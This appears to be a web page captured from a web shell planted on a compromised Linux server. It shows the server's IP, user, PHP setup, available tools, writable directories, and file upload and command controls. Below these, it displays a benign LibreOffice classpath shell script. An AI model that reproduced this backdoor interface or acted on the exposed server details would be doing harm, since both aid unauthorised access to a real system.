Private
Server IP : 195.201.23.43  /  Your IP : 3.147.73.62
Web Server : Apache
System : Linux webserver2.vercom.be 5.4.0-192-generic #212-Ubuntu SMP Fri Jul 5 09:47:39 UTC 2024 x86_64
User : kdecoratie ( 1041)
PHP Version : 7.1.33-63+ubuntu20.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/libreoffice/program/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/libreoffice/program//java-set-classpath
#!/bin/sh
#
# This file is part of the LibreOffice project.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#

#  java-set-classpath - Utility to update the default
#                       CLASSPATH for LibreOffice

if test "z$1" = "z" ; then
    echo "Update the default CLASSPATH for LibreOffice"
    echo ""
    echo "Usage: $0 [dir|jar]..."
    echo ""
    echo "The utility updates the LibreOffice system setting. It adds or removes"
    echo "the given directories and jar-files to or from the default CLASSPATH"
    echo "depending on if they are available on the system or not."
    echo ""
    echo "Parameters:"
    echo "        dir - absolute path to a directory"
    echo "        jar - absolute path to a jar-file"
    exit 0;
fi

JVM_CONFIG_FILE=/usr/lib/libreoffice/program/fundamentalrc

for path in $@ ; do
    if test "z${path%%/*}" != "z" ; then
	echo "Warning: the path "$path" is not absolute and will be ignored"
	continue
    fi
    if test -e $path ; then
	# the file exist
	grep "URE_MORE_JAVA_CLASSPATH_URLS.*file:/*$path\([[:space:]].*\)\?$" $JVM_CONFIG_FILE >/dev/null && continue
	# it is not registered
	TMP_FILE=`mktemp /tmp/ooset-java-class.XXXXXXXXXX` || exit 1
	sed -e "s|^\(.*URE_MORE_JAVA_CLASSPATH_URLS.*\)$|\1 file://$path|" $JVM_CONFIG_FILE >$TMP_FILE
	mv -f $TMP_FILE $JVM_CONFIG_FILE
	chmod 644 $JVM_CONFIG_FILE
    else
	# the file does not exist, remove it from the configuration
	TMP_FILE=`mktemp /tmp/ooset-java-class.XXXXXXXXXX` || exit 1;
	sed -e "s|^\(.*URE_MORE_JAVA_CLASSPATH_URLS.*\)file:/*$path\([[:space:]].*\)\?$|\1\2|" \
	    -e "s/\(URE_MORE_JAVA_CLASSPATH_URLS=\)[[:space:]]\+/\1/" \
	    -e "/^.*URE_MORE_JAVA_CLASSPATH_URLS/s/[[:space:]]\+/ /g" \
	    -e "/^.*URE_MORE_JAVA_CLASSPATH_URLS/s/[[:space:]]*$//" $JVM_CONFIG_FILE >$TMP_FILE
	mv -f $TMP_FILE $JVM_CONFIG_FILE
	chmod 644 $JVM_CONFIG_FILE
    fi
done
Private